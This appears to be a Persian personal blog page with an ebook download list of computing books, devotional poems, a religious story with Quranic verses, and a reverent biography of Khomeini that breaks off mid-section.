نقدی بر فلسفه دین (هاسپرز) خدا در فلسفه (خرمشاهی) هرمنوتیک کتاب و سنت (مجتهد شبستری)

 

زبان: فارسی

حجم کتاب: 944 کیلوبایت

تعداد صفحات: 75

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

کیانوش انصاری بازدید : 153 دوشنبه 26 مهر 1389 نظرات (0)
 01- مرجع كامل امنيت و ضد امنيت شبكه   معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: امير آشتياني
مترجم: خوژت
موضوع کتاب: امنیت و هک
زبان ebook: فارسی
تعداد صفحات کتاب: 1224
نسخه: PDF
اندازه فايل: 28.61 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 11389
ناشر & منبع: http://www.blog.websecurity.ir
آدرس منبع کتاب: http://www.websecurity.ir
 01- مرجع کامل برنامه نویسی به زبان C   معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: عین الله جعفر زاده قمی
مترجم: -
موضوع کتاب: برنامه نویسی
زبان ebook: فارسی
تعداد صفحات کتاب: 664
نسخه: PDF
اندازه فايل: 19.93 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 10211
ناشر & منبع: علوم رایانه
آدرس منبع کتاب: http://www. olomrayaneh.net
 01- آموزش کامل ویندوز 7  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: آرمین ایمانی
مترجم: آرمین ایمانی
موضوع کتاب: آموزش ویندوز 7
زبان ebook: فارسی
تعداد صفحات کتاب: 249
نسخه: Pdf
اندازه فايل: 2.81 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 3811
ناشر & منبع: تک بوک takbook.com
آدرس منبع کتاب: http://www.takbook.com
 02- آموزش كامل ويژوال بيسيك  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: گروه ایران مهر
مترجم: -
موضوع کتاب: برنامه نویسی
زبان ebook: فارسی
تعداد صفحات کتاب: 461
نسخه: PDF
اندازه فايل: 2.44 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 13332
ناشر & منبع: گروه ایران مهر
آدرس منبع کتاب: http://sheidaian.persianblog.com
 03- دهها مقاله كاربردي در زمينه هاي مختلف كامپيوتر  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: سایت ماکرومدیا
مترجم: -
موضوع کتاب: طراحی سایت
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: html
اندازه فايل: 1.07 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 11691
ناشر & منبع: ماکرومدیا ایکس
آدرس منبع کتاب: http://www.MacromediaX.com
 04- قوانين فناوري اطلاعات و ارتباطات ايران  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: جهانگرد - سلجوقي
مترجم: -
موضوع کتاب: اطلاعات و ارتباطات
زبان ebook: فارسی
تعداد صفحات کتاب: 807
نسخه: PDF
اندازه فايل: 3.59 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 3012
ناشر & منبع: دبیرخانه شورای عالی اطّلاع رسانی
آدرس منبع کتاب: http://www.scict.ir
 05- كاملترين ترفندهاي ويندوز  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: AMIR_P30
مترجم: -
موضوع کتاب: ترفند
زبان ebook: فارسی
تعداد صفحات کتاب: 40
نسخه: PDF
اندازه فايل: 605.47 کیلو بایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 28854
ناشر & منبع: پی سی ورلد
آدرس منبع کتاب: http://www.p30world.com
 06- آموزش HTML بصورت كامل با دهها مثال و فلش  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: واحد آموزش مجازی
مترجم: -
موضوع کتاب: طراحی سایت
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: html
اندازه فايل: 2.44 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 16011
ناشر & منبع: مركز تحقيقات فناوري و آموزش
آدرس منبع کتاب: http://www.ostadonline.com
 06- آموزش جامع سی شارپ #C  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: اسلام محمد زاده
مترجم:
موضوع کتاب: برنامه نویسی
زبان ebook: فارسی
تعداد صفحات کتاب: 579
نسخه: PDF
اندازه فايل: 7.49 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 7123
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 07- آموزش تمامي زبانهاي برنامه نويسي  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: بابك شعباني
مترجم: -
موضوع کتاب: برنامه نویسی
زبان ebook: فارسی
تعداد صفحات کتاب: 200
نسخه: PDF
اندازه فايل: 1.22 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 10036
ناشر & منبع: شبکه فناوری اطلاعات ایران
آدرس منبع کتاب: http://www.p30world.com
 07- راهنماي امنيت و فناوري اطلاعات  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: سادوسكاي، دمپزي، گرينبرگ، شوارتز
مترجم: ميردامادي - شجايي - صمدي
موضوع کتاب: تکنولوژی اطلاعات
زبان ebook: فارسی
تعداد صفحات کتاب: 509
نسخه: PDF
اندازه فايل: 4.29 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 2499
ناشر & منبع: .شوراي عالي اطلاعرساني
آدرس منبع کتاب: http://www.scict.ir
 08- راهنماي تصويري استفاده از گوگل  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: محمد بشيري
مترجم: -
موضوع کتاب: امنیت و هک
زبان ebook: فارسی
تعداد صفحات کتاب: 176
نسخه: PDF فارسی
اندازه فايل: 8.80 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 7479
ناشر & منبع: http://www.simorgh-ev.org
آدرس منبع کتاب: http://www.shabgard.org
 09- ترفندهاي ويندوز، اينترنت و كدهاي جاوا(149 ترفند)  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: محمد-حمیدرضا
مترجم: -
موضوع کتاب: ترفند
زبان ebook: فارسی
تعداد صفحات کتاب: 20
نسخه: PDF
اندازه فايل: 209.96 کیلو بایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 8824
ناشر & منبع: تک بوک
آدرس منبع کتاب: http://www.tarfade.blogfa.com
 10- آموزش کامل VHDL  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: pdf
اندازه فايل: 856.45 کیلو بایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 2904
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 11- آموزش كامل PHP  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: pdf
اندازه فايل: 1.45 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 7718
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 12-صدها مقاله برنامه نويسي وب (جاوا، asp ,php و...)  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: html
اندازه فايل: 1.32 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 4629
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 13- آموزش ويژوال بيسيك دات نت  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: احساني - بنايي
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب: 162
نسخه: PDF
اندازه فايل: 2.43 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 6148
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 14- راهبري اينترنت(مشاركت فراگير)  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب: 400
نسخه: PDF
اندازه فايل: 4.41 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 2084
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 15-ويژوال بيسيك در N+1 روز  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: سيد امير احساني
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب: 68
نسخه: PDF
اندازه فايل: 851.56 کیلو بایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 2043
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 16- مباحثي پيرامون Sisco Routers  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب: 71
نسخه: PDF
اندازه فايل: 1.96 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 2886
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 16_ آموزش کامل نرم افزار Dreamweaver   معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: sp-sky
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب: 152
نسخه: PDF
اندازه فايل: 11.20 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 5428
ناشر & منبع: pcseven.com
آدرس منبع کتاب: وجود ندارد
 17- آموزش كامل جاوا اسكريپت  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: html
اندازه فايل: 561.52 کیلو بایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 5469
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 18- طراحي صفحات وب بكمك front page  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: pdf
اندازه فايل: 1.87 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 4452
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 19- طراحي صفحات وب توسط فتوشاپ  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب:
نسخه: exe
اندازه فايل: 747.07 کیلو بایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 7637
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 20- آموزش افكتهاي فتوشاپ بصورت كامل  معروفترین
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده:
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب: 347
نسخه: word
اندازه فايل: 12.10 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 15083
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد
 21- راهنماي كارساز سامبا 
دسترسی: تمامی بازدیدکنندگان تك بوك
نويسنده: تقي زاده - فيروزي
مترجم:
موضوع کتاب:
زبان ebook: فارسی
تعداد صفحات کتاب: 86
نسخه: PDF
اندازه فايل: 1.19 مگابایت
پسورد کتاب: www.takbook.com
دانلود کتاب تک بوک: 999
ناشر & منبع:
آدرس منبع کتاب: وجود ندارد

کیانوش انصاری بازدید : 140 دوشنبه 26 مهر 1389 نظرات (0)
صبر کن وعده ی خدا حق است و فرا خواهد رسید.این مردم بی ایمان و یقین تو را تکان ندهند و سبکسارت نکنند(۶٠_روم)

 


الهی سوز عشقت بیشتر کن             دل ریشم زدردت ریشتر کن

از این غم گر دمی فارغ نشینم         به جانم صد هزاران نیشتر کن


 این عمر به ابر نو بهاران ماند

                           این دیده به سیل کوهساران ماند

ای دوست چنان بزی که بعد از مردن

                           انگشت گزیدنی به یاران ماند


خدا هست هست هست

کیانوش انصاری بازدید : 148 دوشنبه 26 مهر 1389 نظرات (0)
امام حسن و امام حسین (علیهما‌السّلام) بیمار شدند. پیامبر گرامی‌(صلی‌الله‌وعلیه‌وآله وسلم) با جمعی از یارانشان به عیادت دو نوه خود آمدند. در آن دیدار، رسول خدا (صلی‌الله‌وعلیه‌وآله( به حضرت امیر (علیه‌السّلام) فرمودند:
«علی جان اگر برای شفا یافتن و بهبودی فرزندانت می‌توانستی نذری كنی، خدا از سر مهر و كرامت آنان را سلامت ارزانی می‌داشت»
امیرالمؤمنین(علیه‌السّلام) در همان لحظه با خدایش عهد بست و نذر نمود كه اگر دو فرزندش سلامتی یابند سه روز روزه بدارد. از پی حضرت علی(علیه‌السّلام)، حضرت زهرا (علیها‌سلام) نیز نذر كرد و آن گاه «فضه» خادمۀ ایشان همان نذر را نمود.
چیزی نگذشت كه هر دو شفا یافتند و اهل بیت (علیهم‌السّلام) برای وفای به نذر آماده شدند؛ اما در خانه غذایی برای روزه‌داری یافت نمی‌شد. امام علی (علیه‌السّلام) سه صاع جو تهیه نمود. حضرت زهرا (علیها‌سلام)، یك سوم آن را آرد كرد و نان پخت. هنگام افطار، مسكینی بر در خانه آمد و گفت: «سلام بر شما ای خاندان محمد (صلی‌الله‌وعلیه‌وآله)، مستمندی از مستمندان مسلمین هستم. غذایی به من بدهید. خداوند به شما از غذاهای بهشتی مرحمت كند».
آن‌ها همگی مسكین را بر خود مقدم داشتند و سهم خود را به او دادند در حالی كه چیزی جز آب نداشتند. روز دوم را هم‌‌چنان روزه گرفتند. موقع افطار وقتی كه نان جو را برای غذا آماده كرده بودند، یتیمی‌بر در خانه آمد. این بار نیز ایثار كردند و غذای خود را به او دادند و بار دیگر با آب افطار كردند. روز بعد را نیز روزه گرفتند. به هنگام غروب اسیری بر در خانه آمد. باز سهم غذای خود را به او دادند. پس از انجام نذر هنگامی‌كه صبح شد حضرت امیر (علیه‌السّلام) در حالی كه دست دو پسر بزرگوارش را گرفته بود به خدمت پیامبر اكرم (صلی‌الله‌وعلیه‌وآله) رسید. هنگامی‌كه پیامبر آن‌ها را مشاهده كردند، دیدند از شدت گرسنگی می‌لرزند. پیامبر اشك ریختند و فرمود: «این حالی را كه در شما می‌بینم برای من بسیار گران است»
سپس برخاستند و با آن‌ها حركت كردند. هنگامی‌كه وارد خانه حضرت زهرا (علیها‌سلام) شدند ایشان را در محراب عبادت دیدند در حالی كه از شدت گرسنگی ضعیف شده و چشمهایش به گودی نشسته بود. پیامبر گرامی‌(صلی‌الله‌وعلیه‌وآله) اندوهگین شدند. در همین هنگام جبرئیل امین نازل شد و گفت:
«ای محمد این سوره را بگیر. خداوند با چنین خاندانی به تو تهنیت می‌گوید» سپس سوره «هل أتی » «انسان یا دهر» را بر او خواند.
نقل شده است كه از آیه 5 تا آیه22 این سوره در مورد اهل بیت علیهم‌السلام نازل شده است.
«إِنَّ الْأَبْرَارَ یَشْرَبُونَ مِن كَأْسٍ كَانَ مِزَاجُهَا كَافُوراً * عَیْناً یَشْرَبُ بِهَا عِبَادُ اللَّهِ یُفَجِّرُونَهَا تَفْجِیراً * یُوفُونَ بِالنَّذْرِ وَیَخَافُونَ یَوْماً كَانَ شَرُّهُ مُسْتَطِیراً * وَیُطْعِمُونَ الطَّعَامَ عَلَى‏ حُبِّهِ مِسْكِیناً وَیَتِیماً وَأَسِیراً * إِنَّمَا نُطْعِمُكُمْ لِوَجْهِ اللَّهِ لاَ نُرِیدُ مِنكُمْ جَزَاءً وَلاَ شُكُوراً * إِنَّا نَخَافُ مِن رَبِّنَا یَوْماً عَبُوساً قَمْطَرِیراً * فَوَقَاهُمُ اللَّهُ شَرَّ ذلِكَ الْیَوْمِ وَلَقَّاهُمْ نَضْرَةً وَسُرُوراً * وَجَزَاهُم بِمَا صَبَرُوا جَنَّةً وَحَرِیراً * مُتَّكِئِینَ فِیهَا عَلَى الْأَرَائِكِ لاَ یَرَوْنَ فِیهَا شَمْساً وَلاَ زَمْهَرِیراً * وَدَانِیَةً عَلَیْهِمْ ظِلاَلُهَا وَذُلِّلَتْ قُطُوفُهَا تَذْلِیلاً * وَیُطَافُ عَلَیْهِم بِآنِیَةٍ مِن فِضَّةٍ وَأَكْوَابٍ كَانَتْ قَوَارِیرَا * قَوَارِیرَا مِن فِضَّةٍ قَدَّرُوهَا تَقْدِیراً * وَیُسْقَوْنَ فِیهَا كَأْساً كَانَ مِزَاجُهَا زَنجَبِیلاً * عَیْناً فِیهَا تُسَمَّى‏ سَلْسَبِیلاً * وَیَطُوفُ عَلَیْهِمْ وِلْدَانٌ مُخَلَّدُونَ إِذَا رَأَیْتَهُمْ حَسِبْتَهُمْ لُؤْلُؤاً مَنثُوراً * وَإِذَا رَأَیْتَ ثَمَّ رَأَیْتَ نِعِیماً وَمُلْكاً كَبِیراً * عَالِیَهُمْ ثِیَابُ سُندُسٍ خُضْرٌ وَإِسْتَبْرَقٌ وَحُلُّوا أَسَاوِرَ مِن فِضَّةٍ وَسَقَاهُمْ رَبُّهُمْ شَرَاباً طَهُوراً * إِنَّ هذَا كَانَ لَكُمْ جَزَاءً وَكَانَ سَعْیُكُم مَشْكُوراً»
«به یقین ابرار (و نیكان) از جامى مى‏نوشند كه با عطر خوشى آمیخته است، * از چشمه‏اى كه بندگان خاص خدا از آن مى‏نوشند، و از هر جا بخواهند آن را جارى مى‏سازند * آنها به نذر خود وفا مى‏كنند، و از روزى كه شر و عذابش گسترده است مى‏ترسند، * و غذاى (خود) را با اینكه به آن علاقه دارند، به «مسكین‏» و «یتیم‏» و «اسیر» مى‏دهند * (و مى‏گویند:) ما شما را بخاطر خدا اطعام مى‏كنیم، و هیچ پاداش و سپاسى از شما نمى‏خواهیم * ما از پروردگارمان خائفیم در آن روزى كه عبوس و سخت است * خداوند آنان را از شر آن روز نگه مى‏دارد و آنها را مى‏پذیرد در حالى كه غرق شادى و سرورند * و در برابر صبرشان، بهشت و لباسهاى حریر بهشتى را به آنها پاداش مى‏دهد * این در حالى است كه در بهشت بر تختهاى زیبا تكیه كرده‏اند، نه آفتاب را در آنجا مى‏بینند و نه سرما را * و در حالى است كه سایه‏هاى درختان بهشتى بر آنها فرو افتاده و چیدن میوه‏هایش بسیار آسان است * و در گرداگرد آنها ظرفهایى سیمین و قدحهایى بلورین مى‏گردانند * ظرفهاى بلورینى از نقره، كه آنها را به اندازه مناسب آماده كرده‏اند * و در آنجا از جامهایى سیراب مى‏شوند كه لبریز از شراب طهورى آمیخته با زنجبیل است، * از چشمه‏اى در بهشت كه نامش سلسبیل است * و بر گردشان نوجوانانى جاودانى مى‏گردند كه هرگاه آنها را ببینى گمان مى‏كنى مروارید پراكنده‏اند * و هنگامى كه آنجا را ببینى نعمتها و ملك عظیمى را مى‏بینى * بر اندام آنها لباسهایى است از حریر نازك سبزرنگ، و از دیباى ضخیم، و با دستبندهایى از نقره آراسته‏اند، و پروردگارشان شراب طهور به آنان مى‏نوشاند * این پاداش شماست، و سعى و تلاش شما مورد قدردانى است»
خداوند در این آیات مقامات اهل‌بیت علیهم‌السلام را بیان می‌كند.
کیانوش انصاری بازدید : 121 دوشنبه 26 مهر 1389 نظرات (0)

«زیستن»؛ بایدها و نبایدها

 

تضاد

 

«زیستن»

 

بهانه می خواهد

 

رفاه و آسایش می خواهد

 

عشق و محبت نیز می خواهد

 

آیا تا کنون اندیشیده اید

 

«زیستن» چه چیز هایی نمی خواهد؟!!!

 

سخت نیست

 

باور کنید!

 

«زیستن» به هر آن چه تو فکر می کنی برایش مضر است

 

نیاز دارد !!!

 

نیاز

 

«زیستن با زیبایی ها زیباست»

 

ولی

 

«زیستن بدون نازیبایی ها بی معناست»

کیانوش انصاری بازدید : 139 دوشنبه 26 مهر 1389 نظرات (0)

سالها می گذرد حادثه ها می آید                  انتظار فرج از نیمه خرداد کشم

بسم الله الرحمن الرحیم

با دلی‌ آرام‌ و قلبی‌ مطمئن‌ و روحی‌ شاد و ضمیری‌ امیدوار به‌ فضل‌ خدا از خدمت‌ خواهران‌ و برادران‌ مرخص‌، و به‌ سوی‌ جایگاه‌ ابدی‌ سفر می‌كنم‌. و به‌ دعای‌ خیر شما احتیاج‌ مبرم‌ دارم‌. و از خدای‌ رحمان‌ و رحیم‌ می‌خواهم‌ كه‌ عذرم‌ را در كوتاهی‌ خدمت‌ و قصور و تقصیر بپذیردو از ملت‌ امیدوارم‌ كه‌ عذرم‌ را در كوتاهیها و قصور و تقصیرها بپذیرند. و با قدرت‌ و تصمیم‌ اراده‌ به‌ پیش‌ روند و بدانند كه‌ با رفتن‌ یك‌ خدمتگزار درسدّ آهنین‌ ملت‌ خللی‌ حاصل‌ نخواهد شد كه‌ خدمتگزاران‌ بالا و والاتر در خدمتند، والله نگهدار این‌ ملت‌ و مظلومان‌ جهان‌ است‌.

والسلام‌ علیكم‌ و علی‌ عبادالله الصالحین‌ و رحمة‌الله و بركاته‌

 26بهمن 1361 ، 1 جمادی الثانی 1403

روح‌الله الموسوی‌ الخمینی

 

سعدی به روزگاران مهری نشسته بر دل      بیرون نمی توان کرد حتی به روزگاران

هر چه از خرداد 68 می گذرددلهای داغدار از غم هجنران آن عزیز یگانه ، اندوهناک تر وسرشک نهفته در دیده عاشقان دلباخته او بر دامن بستر دریای گهر جاری تر می گردد.

۲۱سال گذشت ، ۲۱سال از آن روز تلخ پر خاطره فراموش نشدنی می گذرد ، وما اکنون در آستانه ورود به بیستمین سالگرد ارتحال حضرت امام خمینی رضوان الله تعالی علیه قرار گرفته ایم . خاطره شکوهمند زندگی ودرگذشت او نیز حیاتی دیگر وعظمتی دیگر بود که هرگز از اذهان وافکار زدوده نخواهد شد.

ما از آن بزرگوار چه تصویری در ذهن داریم ؟ آیا نه این است که در برابر چشمهای مشتاق نسل امروز وفردا بیش از آنکه جلوه جمال معنوی اش را ترسیم کرده باشیم ، به ترسیم جلوه هایی از جلال وجبروت او که البته آن نیز جلوه ای از جلوات وجود اوست ، روی آوریم ؟

نام امام خمینی به حق ، با طلابت روح وعزت نفس وشکوه شخصیت وثبات قدم وقاطعیت داشتن وانقلابی بودن واستوار ماندن مترادف است واینهمه نه تنها تمامی ابعاد وجودی عزیز نیست ، بلکه اگر منفک ومجرد از جوهر اصلی هویت ووجه غالب شخصیت او که همان (( خلق عظیم محمدی )) است در نظر گرفته شود ، به نوعی تحریف وانحراف در شناخت حقیقت حیات پر برکتش منجر خواهد شد . مگر نه این است که از میان سه عنصر اساسی مؤثر در پیشرفت یعنی علی (ع) وثروت خدیجه (س) وخلق عظیم محمد (ص) ، اگر بنا باشد یکی را به عنوان اصل واساس ومبنا ونتیجتاً امر مقدم ووجه غالب وجوهر اصلی بازیابی وبازشناسی کنیم آن یک بدون تردید همان خواهد بود که مصداق آیه کریمه « وانک لعلی خلق عظیم » است ؟

خلق عظیم محمدی ، منبعث از عرفان الهی وعشق ملکوتی ورحمت دینی ووارستگی از انواع پرستش های دنیوی « مقام پرستی ، شهرت پرستی ، قدرت پرستی ، مدح وثناپرستی و...» ودر یک کلام منبعث از خداپرستی وعشق به بندگان خدا وآفریده های رنگارنگ خداوند است ودریای وجود پر برکت امام خمینی رضوان الله علیه قطره ای از خلق محمدی وعرفان حقیقی الهی را همچون گوهری ناب در صدف سینه خویش داشت . وهم از این منظر عظیم بود که مردم - به عنوان آفریده های او حاملان بار امانت او ، صاحبان اصلی حکومت وولی نعمت های همه حاکمان وپیشوایان – صمیمانه عشق می ورزیدند .

 امام خمینی (ره) در بیستم جمادی الثانی 1320 قمری برابر با 30 شهریور 1281 ، مصادف با روز ولادت فرخنده بانوی بزرگ اسلام ، حضرت فاطمه زهراء سلام الله علیها ، در شهرستان خمین دیده به جهان گشود . این مولود از تبار قهرمان توحید ، ابراهیم خلیل واز سلاله پاک محمدوآل محمد ب.د که بارها جهان را به لرزه درآورد، بتهای جدید را شکست وندای توحید را در قلبهای مشرکین غرب وقاره ها وخانه های کفر وشرک طنین انداز کرد .

پدر ایشان آیت الله شهید سید مصطفی موسوی  فرزند برومند مرحوم سید احمد و مادر بزرگوارشان بانو هاجر دختر مرحوم آیت الله میرزا احمد ، از عالمان ومدسان والا مقام بود .

در پنج سالگی بود که پدر بزرگوارشان با توطئه اشرار در سن 47 سالگی و در نیمه را ه خمین واراک به شهادت رسید ودر نجف اشرف به خاک سپرده شد .

با شهادت پدر ،  حضرت امام (ره ) تحت سرپرستی عمه بزرگوارشان « بانو صاحبه » ومادر گرامیش « بانو هاجر » قرار گرفت  .تحصیلات ابتدایی وخواندن ونوشتن وتعلیم خط را تا سن 15 سالگی در خمین ، نزد اساتید منطقه فرا گرفت وسپس به تحصیل علوم اسلامی پرداخت صرف و نحو ومنطق را نزد برادر بزرگوارش ، حضرت آیت الله پسندیده آموخت و تا سال 1338 قمری ، مقدمات را در محضر ایشان ادامه داد . سپس به حوزه علمیه اراک وارد شد و به تحصیل و تکمیل ادبیات نزد اساتید  فن پرداخت . امام در سال 1340 قمری ، در حالی که ( مطول ) شروع کرده بود ، همراه با مرحوم آیه الله حائری به قم تشرف یافتند وهمزمان با پی ریزی حوزه مقدسه قم در مدرسه دارالشفاء سکنا گزید وبا جدیت تمام به فرا گیری علوم رایج حوزوی پرداخت .

ابعاد علمی امام :

-فقه واصول

در سال 1345 قمری ، حضرت امام با تمام سطوح عالیه ، در حوزه درس مرحوم حاج شیخ عبدالکریم حائری حضور یافت ودر محضر آن استاد بزرگ ودیگر اساتید درس خارج ، چون آیه الله حاج میر سید علی یثربی کاشانی ، میرزا محمد صادق احمد آبادی و مرحوم ابوالمجد مسجد شاهی ، پایه های علمی خود را استوار وتکمیل کرد وبه درجه اجتهاد نایل آمد . از جمله هم بحثهای حضرت امام (ره) مرحوم آیة الله سید محمد داماد ، وآیه الله بهاالدینی ومرحوم آقای زنجانی بوده اند .

در سال 1355 قمری که مرحوم آیه الله حائری دیده از جهان فرو بست ، امام خمینی در زمره مجتهدین مبرز ونوابغ  علمی قرار داشت وچون ستاره ای در آسمان حوزه علمیه قم می درخشید ودر فقه واصول صاحب مبنا بود . امروزه آنچه از آثار فقهی واصولی حضرت امام در دسترس حوزه های علمیه قرار دارد از استوار ترین متون ومحکمترین مبانی است که تراوش اندیشه های اخلاقی ایشان است .امام خمینی علاوه بر مقام فقاهت ، در علم هیئت ، فلسفه وعرفان نیز مهارتی ویژه داشت و همان گونه که در فقه واصول دارای مبنای خاص  خود بود در این رشته ها نیز صاحب مبنا  بود . اساتید معظم له در فلسفه ، عرفان وهیئت ، مرحوم شیخ علی اکبر یزدی ( معروف به حکیم ) ، مرحوم آیه الله حاج شیخ محمد علی شاه آبادی ، مرحوم سید ابوالحسن رفیعی قزوینی وحاج میرزا جواد ملکی تبریزی بودند .

- روایة الحدیث ودرایة الحدیث

 حضرت امام در علم رجال متنجر بوده ، در نقل حدیث اجازاتی از مرحوم نوری ( صاح مستدرک الومسائل ) حاج شیخ عباسی قمی (ره ) ومرحوم ابوالمجد مسجد شاهی داشتند که در ابتدای کتاب شریف اربعین (چهل حدیث ) سلسله سند خود را نقل فرموده اند .

-تفسیر

گرچه تفسیر قرآن در حوزه های علمیه به عنوان یک درس در متن قرار نداشته است ایشان در تفسیر سوره حمد برای آشنایی به قرآن و تفسیر کافی است که بر شیوه وروش برداشت امام از قرآن اطلاع یابد .حضرت امام به طلاب درباره تفسیر شریف  مجمع البیان تاکید فراوانی داشتند.

خودسازی :

رهبر فقید انقلاب از همان آغاز جوانی به خودسازی به خوسازی وتهذیب نفس پرداخت پیشرفت امام در این امر به قداری سریع بود که ایشان پس از فوت مرحوم آیة ا... حاج شیخ عبدالکریم حائری ، بر کرسی درس اخلاق در حوزه علمیه قم برای فضلا وطلاب وعامه مردم نشستند وبه تهذیب دیگران پرداختند. این رتبه ومقام را امام خمینی از سحر خیزی ، تهجدوراز ونیاز نیمه های شب به درگاه خدا مناجات شعبانیه ودعای مکارم الاخلاق وزیارت جامعه وعاشوراو.... کسب نموده بودند .

عشق به اهل بیت :

عشق وعلاقه وحب  به مقام ولایت کبری واهل بیت (ع) در حضرتش به اندازه ای قوی بود که در مجلس سوگواری به محض ذکر مصائب ائمه وبویژه ابی عبدا.. (ع) اشک از دیده گانش جاری می شد وشانه های مبارکش به شدت  تکان میخورد . عمق و ولایت وعشق وعلاقه امام را می توان از زیارتهای مکرر عاشورا و... و زیارت امیرالمؤمنین (ع) ، جامعه کبیر در سالیانی که در نجف اشرف بودند وهمه روزه بعد از نماز مغرب وعشاء به حرم مشرف می شدند دریافت .

برنامه ریزی :

